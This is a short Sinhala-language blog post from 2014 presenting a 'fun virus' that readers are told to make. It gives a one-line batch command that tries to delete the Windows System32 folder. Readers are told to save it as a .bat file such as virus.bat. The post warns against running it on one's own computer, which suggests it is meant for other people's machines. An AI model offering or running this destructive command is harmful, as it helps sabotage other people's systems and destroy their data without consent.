පට්ට Fun Virus එකක් - Aluth Tricks - අලුත් ට්‍රික්ස්

Wednesday, July 23, 2014

පට්ට Fun Virus එකක්

පොඩි ඒත් ටිකක් භයානක VIRUS එකක් හදමුද…..?
 මේක පොඩි සරල Code එකක්.Note Pad එක අරගෙන පහල තියන Code එක Type කරගන්නකො

 ****මේක බැරිවෙලාවත් ඔයාගෙ පරිගණකයේනම් Run කරන්න එපා****


@echo off del c:\windows\system32
          ඒක ඔයාල කැමති නමකින් save කරගන්න. හැබැයි නම අගට .bat කියල දෙන්න ඕන. 
Eg: virus.bat
****මේක බැරිවෙලාවත් ඔයාගෙ පරිගණකයේනම් Run කරන්න එපා****

මේකෙන් ඔයාගෙ පරිගණකයේ System 32 File එක Delete කරනවා.Windows Crash වෙනවා.

No comments:

Post a Comment